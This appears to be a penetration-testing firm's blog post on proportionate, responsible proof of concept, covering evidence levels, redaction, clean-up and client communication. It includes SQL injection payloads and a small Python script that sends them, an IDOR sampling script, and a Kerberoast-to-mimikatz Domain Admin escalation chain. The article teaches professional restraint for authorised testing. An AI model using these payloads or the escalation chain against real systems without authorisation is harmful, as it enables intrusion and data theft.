
Responsible Proof of Concept in Penetration Testing

> poc --demonstrate=impact --extract=minimum --harm=zero_

Peter Bassill · 13 May 2025

Nobody fixes a finding they don't believe.

A penetration test report lands on the IT Director's desk. Finding #7: SQL injection in the customer search endpoint. Severity: High. Remediation: parameterise all database queries. The IT Director forwards it to the development lead. The development lead reads the description, looks at the evidence — a screenshot of Burp Suite showing an error-based response — and says: "That's the test environment. The WAF would catch this in production. I'll add it to the backlog."

Six months later, the same vulnerability is exploited by an attacker who exfiltrates 90,000 customer records. The development lead's WAF theory was wrong. But the pen test report never proved it was wrong — it showed that the injection existed without demonstrating what it could achieve.

Now imagine the same finding, different evidence. The report includes a screenshot of 10 rows extracted from the production customer table (with PII redacted), the exact SQL payload used, the time taken (under 30 seconds), and a note confirming that the WAF did not block the request. The development lead doesn't add this to the backlog. They fix it that afternoon.

The vulnerability was identical. The remediation was identical. The difference was the proof of concept — and that difference determined whether the finding was fixed or forgotten.

The Credibility Equation

A finding without convincing proof of concept is a suggestion. A finding with strong PoC is a fact. The entire value of a penetration test — the remediation it drives, the risk it reduces, the investment it justifies — rests on whether the people reading the report believe the findings are real, exploitable, and consequential.


The four things proof of concept achieves.

Proof of concept isn't an optional flourish added to impress the reader. It serves four distinct functions, each of which directly affects whether the pen test delivers real value or gathers dust.

Function | What It Does | What Happens Without It
Eliminates doubt | Confirms the vulnerability is real and exploitable in the specific environment — not a false positive, not a theoretical risk, not something the WAF would catch. | Findings are disputed: "Are you sure this works in production?" "Our security controls should block this." "The scanner flags this every time — it's a known false positive." Disputed findings don't get fixed.
Quantifies impact | Demonstrates exactly what an attacker would achieve: the data they'd access, the privileges they'd gain, the systems they'd reach. Turns abstract risk into concrete consequence. | Impact is vague: "could lead to data breach." Every medium-severity finding says this. Without specific, demonstrated impact, the finding competes equally with 29 others for remediation resources.
Enables reproduction | Provides the development team with exact steps, payloads, and parameters to reproduce the finding in their own environment — essential for building, testing, and validating a fix. | Developers can't reproduce the finding: "We tried what the report described and it didn't work." Without reproducible PoC, the development cycle stalls. The fix is guessed at rather than verified.
Drives urgency | Creates an emotional and rational response: "Someone demonstrated they can access our customer database." That visceral realisation — this actually works — is what turns a finding from a line in a spreadsheet into an emergency. | Findings are prioritised by CVSS score and triaged into the normal development cycle. A high-severity finding with weak PoC sits in the backlog for months. The same finding with strong PoC is fixed in days.

Too little, just right, too much.

Proof of concept exists on a spectrum. At one end, insufficient PoC fails to convince anyone the finding is real. At the other end, excessive PoC goes beyond what's needed to prove impact and enters territory that creates unnecessary risk, damages trust, or raises legal concerns.

The skill — and it is a skill, not a formula — lies in finding the point that's sufficient to prove the finding is real and impactful, without going a single step further than necessary.

Finding | Insufficient PoC | Appropriate PoC | Excessive PoC
SQL injection | "The parameter appears to be injectable based on error message differences." No extraction demonstrated. | 10 rows extracted from the customer table using a UNION SELECT with LIMIT 10. PII redacted in the report. Exact payload, request, and response documented. | Full database dump of 90,000 records extracted and included in the report appendix. Real customer PII visible in the evidence.
IDOR | "Changing the ID parameter returns a different response." No demonstration that it's another user's data. | 3 different user IDs tested, each returning a different customer's profile data. Screenshots show the parameter change and the corresponding data. Pattern confirmed as systemic. | All 43,000 user IDs enumerated. A CSV export of every customer's profile data included as evidence.
Domain Admin | "A Kerberoastable account was identified." No cracking attempted, no DA logon demonstrated. | Hash cracked offline in 4 minutes. DA logon demonstrated via whoami /groups. Screenshot shows the privileged context. No AD modifications made. | Tester creates a new Domain Admin account, resets the KRBTGT password, or accesses every mailbox to "prove" the extent of access.
Remote code execution | "The file upload function accepts PHP files." No execution confirmed. | Minimal PHP file uploaded, executes whoami and hostname. Screenshot of output. File immediately removed. Clean-up confirmed. | Full web shell deployed with file browser, command execution, and database access. Left in place "for the client to see."
Credential exposure | "Credentials were found in a public repository." No validation that they work. | Credentials tested against the target system. Successful authentication demonstrated via screenshot. Access level documented. Password partially redacted in the report. | Credentials used to log into every system they grant access to. Internal emails read. Documents downloaded. Screenshots of sensitive internal communications included in the report.

The middle column is the target. Every example follows the same principle: demonstrate the vulnerability is real, demonstrate the impact is significant, then stop. The left column doesn't prove enough to drive action. The right column proves more than necessary and creates new risks in the process.
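
To make the middle column concrete for IDOR, a minimal evidence-gathering script might look like the sketch below. The endpoint, session token, and sample IDs are hypothetical placeholders, not details from any engagement; the point is the restraint: three IDs, truncated output, nothing exported.

import requests

BASE_URL = "https://target.example/api/profile"   # hypothetical endpoint
SAMPLE_IDS = [1001, 2047, 3310]                   # 3-4 IDs prove the pattern

session = requests.Session()
session.headers["Authorization"] = "Bearer <tester-session-token>"  # placeholder

for user_id in SAMPLE_IDS:
    resp = session.get(f"{BASE_URL}/{user_id}", timeout=10)
    # Record status and a short excerpt only: enough to show the ID
    # parameter controls whose data is returned; redact before reporting.
    print(user_id, resp.status_code, resp.text[:80])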


What happens when PoC goes too far.

Excessive proof of concept isn't just unnecessary — it actively harms the engagement, the client relationship, and potentially the tester's own legal position. The consequences are real and avoidable.

Data Protection Liability
Extracting a full database of customer records during a pen test creates a data protection obligation. The tester becomes a processor of personal data under UK GDPR. If that data is mishandled — stored insecurely, retained too long, transmitted without encryption — the tester and the testing firm are liable. Extracting 10 rows creates minimal risk. Extracting 90,000 creates a data breach waiting to happen.
Erosion of Trust
When a client sees that the tester accessed every mailbox on the domain, read internal HR documents, or extracted the CEO's personal files, the reaction isn't "what a thorough test" — it's "who gave you permission to do that?" Trust is the foundation of the testing relationship. Excessive PoC erodes it, and once eroded, the client may never commission another test from that provider.
Legal Exposure
Under the Computer Misuse Act 1990, a penetration tester's protection is the client's authorisation — and that authorisation extends only to the systems and activities defined in the scope. Accessing data or systems beyond what's necessary to demonstrate the finding may exceed the bounds of that authorisation — particularly if the rules of engagement specify minimum necessary access. Unauthorised access is not a grey area; it's a criminal offence.
Report Contamination
A report containing real customer PII, sensitive internal documents, or confidential communications becomes a security risk in itself. Every person who reads the report has access to that data. If the report is stored insecurely, emailed in the clear, or retained beyond its useful life, the pen test has inadvertently created the very exposure it was supposed to prevent.
Remediation Distraction
When the conversation after a pen test is about what the tester did rather than what the vulnerabilities are, the engagement has failed. Excessive PoC shifts the focus from "how do we fix this?" to "why did you access that?" — and the vulnerabilities stay unpatched while the relationship is repaired.

Five principles for responsible PoC.

Responsible proof of concept isn't subjective — it follows a clear set of principles that can be applied consistently across every finding, every engagement, and every tester.

Principle | What It Means | How to Apply It
1. Minimum sufficient evidence | Capture the least amount of data and access needed to prove the finding is real and its impact is clear. No more. | SQL injection: extract 5–10 rows, not the full table. IDOR: test 3–4 IDs, not all of them. DA: demonstrate the logon, don't create accounts. RCE: run whoami, don't install a persistent shell.
2. Impact over access | The goal is to demonstrate what an attacker could achieve, not to achieve it in full. The PoC proves the potential; it doesn't realise it. | Instead of exfiltrating all customer data, extract a sample and state: "All 43,000 records are accessible via this method. We retrieved 10 as evidence." The sample proves the vulnerability; the number proves the scale.
3. Redact by default | Any personal data, credentials, or sensitive information captured as evidence should be redacted in the report unless the unredacted content is essential to understanding the finding. | Show extracted data with PII replaced: john.s****@acme.co.uk. Show cracked passwords partially: W1nt***25!. The finding is equally credible with or without the full values (a minimal redaction sketch follows this table).
4. Clean up immediately | Every artefact created during PoC — uploaded files, test accounts, registry entries, web shells, scheduled tasks — is removed immediately after the evidence is captured. | Maintain a running clean-up log. Check every item off before the engagement closes. Include a clean-up confirmation section in the report. Leave nothing behind.
5. Communicate before you escalate | If the PoC requires access to particularly sensitive data or systems — the CEO's mailbox, the HR database, the finance system — check with the client before proceeding. | A quick call: "We've achieved DA and can access the mailbox server. Do you want us to demonstrate access to a specific mailbox, or is the DA logon sufficient evidence?" This takes 30 seconds and prevents 30 days of relationship repair.
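
To ground principle 3, here is a minimal redaction sketch in Python. The helper names and masking rules are illustrative, chosen to match the examples in the table, and should be adapted to your own reporting standard.

def redact_email(email: str) -> str:
    """Keep the start of the local part; mask the rest, keep the domain."""
    local, _, domain = email.partition("@")
    visible = local[:6]
    return f"{visible}{'*' * max(len(local) - len(visible), 4)}@{domain}"

def redact_password(password: str) -> str:
    """Show enough of a cracked password to prove the crack, no more."""
    if len(password) <= 7:
        return "*" * 8
    return f"{password[:4]}***{password[-3:]}"

print(redact_email("john.smith@acme.co.uk"))   # john.s****@acme.co.uk
print(redact_password("W1nter2025!"))          # W1nt***25!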

Responsible PoC for common findings.

To make the framework concrete, here's how responsible PoC applies to the findings we encounter most frequently. Each example shows what to capture, what to redact, and where to stop.

PoC: SQL Injection — Customer Search Endpoint
# Step 1: Confirm injection
payload = "' OR 1=1--" # Response differs from clean request
confirmed = true # Error-based + blind boolean confirmed

# Step 2: Demonstrate impact
payload = "' UNION SELECT id,email,name FROM customers LIMIT 10--"
rows_returned = 10 # Sufficient to prove full read access
total_rows = 43291 # Confirmed via COUNT(*) — not extracted

# Step 3: Document and stop
evidence = request + response (screenshot)
redaction = emails and names partially masked
waf_bypass = confirmed (no blocks observed)
stop_reason = impact demonstrated, no further extraction needed
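
As a companion to the summary above, step 2 might be captured with a few lines of Python using the requests library. The endpoint and parameter name are hypothetical, and the LIMIT 10 payload deliberately caps extraction at sample size.

import requests

URL = "https://target.example/search"  # hypothetical vulnerable endpoint
PAYLOAD = "' UNION SELECT id,email,name FROM customers LIMIT 10--"

resp = requests.get(URL, params={"q": PAYLOAD}, timeout=10)

# Preserve the exact request and response for the report appendix; this
# is the reproducible evidence a developer needs to verify the fix.
evidence = {
    "request_url": resp.request.url,
    "status_code": resp.status_code,
    "body_excerpt": resp.text[:500],  # redact PII before this enters the report
}
for key, value in evidence.items():
    print(key, ":", value)
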
PoC: Privilege Escalation — Standard User to Domain Admin
# Step 1: Enumerate escalation paths
bloodhound --collect=all # Shortest path: 3 hops to DA
path = user → kerberoast svc_sql → logon to DB01 → extract DA hash

# Step 2: Execute chain
kerberoast svc_sql → cracked in 7 minutes # Password: Summer2***
psexec svc_sql@DB01 → local admin confirmed
mimikatz → DA hash extracted from memory
da_logon → DC01 'whoami /groups' confirms DA

# Step 3: Document and stop
evidence = screenshots at each step + timeline
total_time = 2h 14m from standard user to DA
NOT_done = no new accounts, no GPO changes, no password resets
stop_reason = DA demonstrated, objective achieved
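
Principle 4's running clean-up log can be as simple as the sketch below. The field names and the example artefact are illustrative; the closing assertion mirrors the "leave nothing behind" check before an engagement closes.

from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

@dataclass
class Artefact:
    description: str
    created_at: datetime
    removed: bool = False
    removed_at: Optional[datetime] = None

cleanup_log: list[Artefact] = []

def record(description: str) -> Artefact:
    """Log an artefact the moment it is created, not at write-up time."""
    artefact = Artefact(description, datetime.now(timezone.utc))
    cleanup_log.append(artefact)
    return artefact

def confirm_removed(artefact: Artefact) -> None:
    """Check an artefact off as soon as it is deleted from the target."""
    artefact.removed = True
    artefact.removed_at = datetime.now(timezone.utc)

shell = record("whoami.php uploaded to /uploads on web01")
confirm_removed(shell)

# Engagement close-out: nothing may remain outstanding.
outstanding = [a.description for a in cleanup_log if not a.removed]
assert not outstanding, f"Artefacts not removed: {outstanding}"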

Recognising good PoC in a pen test report.

As the client receiving a pen test report, you can assess the quality of proof of concept by looking for specific indicators. Strong PoC doesn't just prove the tester is technically capable — it demonstrates professional judgement, ethical awareness, and respect for your data.

Indicator | Strong PoC | Weak PoC
Evidence type | Full request/response pairs, timestamped screenshots, attack narrative explaining each step, reproduction instructions | A single screenshot with no context, or a paragraph describing what the tester claims happened without supporting evidence
Data handling | Extracted data is minimal (5–10 rows), PII is redacted, and the report states how much additional data was accessible without extracting it | Large volumes of unredacted data included in the report, or no data extracted at all (just a claim that access was possible)
Proportionality | The level of exploitation matches the finding. A confirmed SQLi with 10 sample rows. A DA logon with whoami. An RCE with a single command execution. | Either under-proven ("this may be exploitable") or over-proven (full database dump, persistent backdoor left in place, sensitive documents included in the report)
Reproducibility | Step-by-step reproduction instructions that a developer can follow independently to verify the finding and test their fix | Vague descriptions: "inject a payload into the search field" without specifying which payload, which parameter, or what response to expect
Impact clarity | Specific impact statement: "43,291 customer records accessible. Mandatory ICO notification under UK GDPR. Estimated regulatory fine: up to 4% of annual turnover." | Generic impact: "could lead to data breach" or "may allow unauthorised access" — language that applies to any finding at any severity
Clean-up confirmation | Report includes a section listing every artefact created during testing and confirming its removal | No mention of clean-up, or an assumption that the client knows what was left behind

PoC when the stakes are highest.

Some targets require extra care — not because the methodology changes, but because the consequences of getting PoC wrong are amplified. When the data is more sensitive, the margin for excess is smaller, and the communication with the client needs to be more deliberate.

Target | Additional PoC Considerations
Healthcare data | Patient records carry legal protections beyond standard GDPR (Caldicott Principles, NHS Data Security and Protection Toolkit). Extract zero real patient data if possible — demonstrate access to the table structure and row count without retrieving identifiable records. If extraction is essential, use synthetic or obviously-test records where available.
Financial systems | Never demonstrate a business logic flaw by completing a real financial transaction, even a small one. Demonstrate the ability to reach the transaction endpoint, document the parameters, and explain the theoretical outcome. If a test environment supports it, execute the transaction there.
Email and communications | Demonstrating mailbox access doesn't require reading real emails. Show that the mailbox is accessible (screenshot of the inbox list without opening messages), document the access path, and stop. Reading internal communications creates confidentiality obligations that outlast the engagement.
HR and personnel data | Salary data, disciplinary records, and performance reviews are among the most sensitive categories of internal data. If your attack path reaches the HR system, demonstrate that you can access it — not what's in it. A screenshot of the HR application's dashboard is proof enough.
Legal and M&A documents | Access to legal hold data, active litigation files, or M&A documentation could have regulatory implications (insider trading, legal privilege). If the path reaches these systems, inform the client immediately and agree on evidence capture before proceeding.
Operational technology | OT environments control physical processes — manufacturing, energy, water treatment. PoC in OT should demonstrate network access to the OT segment and identification of control systems, never direct interaction with PLCs, SCADA interfaces, or safety systems.

What you should expect and what to ask.

Responsible PoC isn't solely the tester's responsibility. The client shapes the engagement through the rules of engagement, the scoping conversation, and ongoing communication during testing. Here's how to ensure the PoC in your engagement is both credible and responsible.

Define PoC Expectations in the RoE
Specify what level of evidence you expect. Do you want full exploitation or documented-but-unexploited findings for certain vulnerability classes? Should the tester contact you before accessing sensitive systems? Should data extraction be limited to synthetic or test records where available? These preferences belong in the rules of engagement, not in a post-engagement complaint.
Agree an Escalation Channel
Provide the tester with a named individual who can authorise or restrict PoC activities in real time. When the tester calls to say "I've reached Domain Admin and can access the mailbox server — shall I demonstrate?", someone needs to make that decision within minutes, not days.
Ask About Data Handling
Before the engagement: how will extracted data be encrypted, stored, retained, and destroyed? After the engagement: confirm that all extracted data has been securely destroyed. Request a written confirmation. This isn't paranoia — it's data governance.
Review the Evidence Critically
When the report arrives, assess each finding's PoC: is it sufficient to believe the finding is real? Is it proportionate to the severity? Is any data included that shouldn't be? Strong PoC should make you confident in the finding. Excessive PoC should make you concerned about the tester's judgement.
Provide Feedback
Tell your provider if the PoC was too conservative ("we didn't find this convincing enough to justify the remediation investment") or too aggressive ("we didn't expect you to access actual customer records"). Calibration improves with feedback, and the provider should welcome it.

How PoC eliminates the noise.

Beyond credibility and impact, proof of concept serves a quieter but equally important function: it eliminates false positives. Vulnerability scanners generate false positives at a rate that ranges from irritating to overwhelming — findings that look real in the scanner output but aren't exploitable in the specific environment.

Scanner Says... | PoC Reveals...
"SQL injection detected in the search parameter" (based on a time delay in the response) | The time delay is caused by a slow database query, not by injected SQL. The parameter is correctly parameterised. Finding is a false positive.
"Cross-site scripting in the name field" (based on reflected output) | The output is reflected but HTML-encoded. The XSS payload renders as text, not as executable code. Finding is a false positive.
"Remote code execution: Apache Struts CVE-2017-5638" (based on version banner) | The server returns an Apache Struts banner but is actually running a different framework behind a reverse proxy. The CVE doesn't apply. Finding is a false positive.
"Open redirect in the login return URL" (based on parameter manipulation) | The redirect is restricted to a whitelist of internal domains. External URLs are rejected. The scanner didn't test the whitelist. Finding is a false positive.
"SSL certificate hostname mismatch" (flagged during scan) | The mismatch only occurs on an internal hostname that isn't accessible from the internet. The public-facing certificate is correct. Finding is accurate but irrelevant to external risk.

Every false positive that reaches the remediation backlog wastes developer time, erodes trust in the testing process, and dilutes attention from the findings that actually matter. Manual PoC verification eliminates false positives before they enter the report — ensuring that every finding your team works on is confirmed, exploitable, and worth fixing.
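
For the reflected XSS row above, the manual verification step can be a few lines of Python. The URL and parameter are hypothetical, and the marker string is chosen to be unique and harmless.

import html
import requests

URL = "https://target.example/greet"          # hypothetical endpoint
MARKER = "<script>poc_4271()</script>"        # unique, harmless marker

resp = requests.get(URL, params={"name": MARKER}, timeout=10)

if MARKER in resp.text:
    print("Payload reflected unencoded: finding confirmed, capture evidence")
elif html.escape(MARKER) in resp.text:
    print("Payload reflected but HTML-encoded: false positive, discard")
else:
    print("Payload not reflected: investigate filtering before concluding")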


The bottom line.

Proof of concept is what makes a pen test finding credible, actionable, and urgent. Without it, findings are suggestions that compete for remediation resources based on abstract severity scores. With it, findings are facts — demonstrated, evidenced, and impossible to deprioritise.

But PoC that goes too far creates its own risks: data protection liability, trust erosion, legal exposure, and a remediation conversation that focuses on the tester's conduct rather than the organisation's vulnerabilities. The line between sufficient and excessive isn't arbitrary — it's defined by a clear principle: demonstrate the impact with the minimum evidence necessary, then stop.

The best proof of concept leaves no doubt that the vulnerability is real, no question about what an attacker could achieve, and no unnecessary data in the report. That's the standard every finding should meet — and it's the standard that turns a pen test from a document into a decision.


Credible findings. Responsible proof.

Every finding in our reports is backed by proportionate, responsible proof of concept — sufficient to drive remediation, careful enough to protect your data, and documented to a standard that satisfies boards, auditors, and regulators.